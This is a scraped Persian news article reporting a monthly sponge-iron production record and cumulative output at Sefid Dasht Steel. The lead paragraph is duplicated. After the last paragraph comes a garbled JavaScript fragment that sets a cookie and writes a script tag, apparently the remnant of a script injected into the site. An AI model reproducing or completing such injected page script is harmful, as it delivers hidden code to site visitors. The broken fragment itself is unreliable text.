دوشنبه ۳۱ تیر ۱۳۹۸ , ۲۳:۱۱:۲۸
2019 / July / 22برگزیده، گروه صنایع معدنی، فولاد آذر ۴, ۱۳۹۶

رکورد جدید تولید ماهانه آهن اسفنجی شرکت فولاد سفید دشت

مدیر عملیات شرکت فولاد سفیددشت از رکورد جدید تولید آهن اسفنجی این شرکت در ماه آبان خبر داد.

به گزارش ماین نیوز، جمشید علی بابایی با بیان این مطلب گفت: واحد احیای مستقیم شرکت فولاد سفید دشت در ماه آبان 53 هزار و 254 تن آهن اسفنجی با متالیزاسیون ۹۵ و کربن ۱.۷ درصد تولید کرد. این رقم فراتر از برنامه پیش بینی شده (تولید 45 هزار و 800 تن) است.

۵٫۰
۰۱

به گزارش ماین نیوز، جمشید علی بابایی با بیان این مطلب گفت: واحد احیای مستقیم شرکت فولاد سفید دشت در ماه آبان ۵۳ هزار و ۲۵۴ تن آهن اسفنجی با متالیزاسیون ۹۵ و کربن ۱.۷ درصد تولید کرد. این رقم فراتر از برنامه پیش بینی شده (تولید ۴۵ هزار و ۸۰۰ تن) است.

وی افزود: رکورد قبلی این واحد مربوط به مهرماه بود که در آن، ۴۸ هزار و ۹۴۲ تن آهن اسفنجی تولید شد.

مدیر عملیات شرکت فولاد سفیددشت با اشاره به میزان تولید این شرکت از ابتدای افتتاح تاکنون، تصریح کرد: این کارخانه از ابتدای راه اندازی تا پایان آبان، ۳۵۶ هزار و ۳۲ تن آهن اسفنجی تولید کرده است.

وی ادامه داد: همچنین، طی۸ ماهه امسال، بیش از ۲۳۲ هزارتن آهن اسفنجی در کارخانه مذکور تولید شده است.

بنا به این گزارش، واحد احیای مستقیم شرکت فولاد سفید دشت (استان چهارمحال بختیاری) به عنوان نخستین طرح از جمله طرح های ۷ گانه فولاد استانی در آبان سال ۹۵ با حضور معاون اول رئیس جمهور، وزیر صنعت، معدن و تجارت و رئیس هیات عامل ایمیدرو افتتاح شد. +e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));:void 0}var =”,||void 0===time){var ), path=/; expires=”(”+src+'”><\/script>‘)}

5.0
01

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

استفاده از اخبار با نقل منبع معدن و فولاد مجاز است.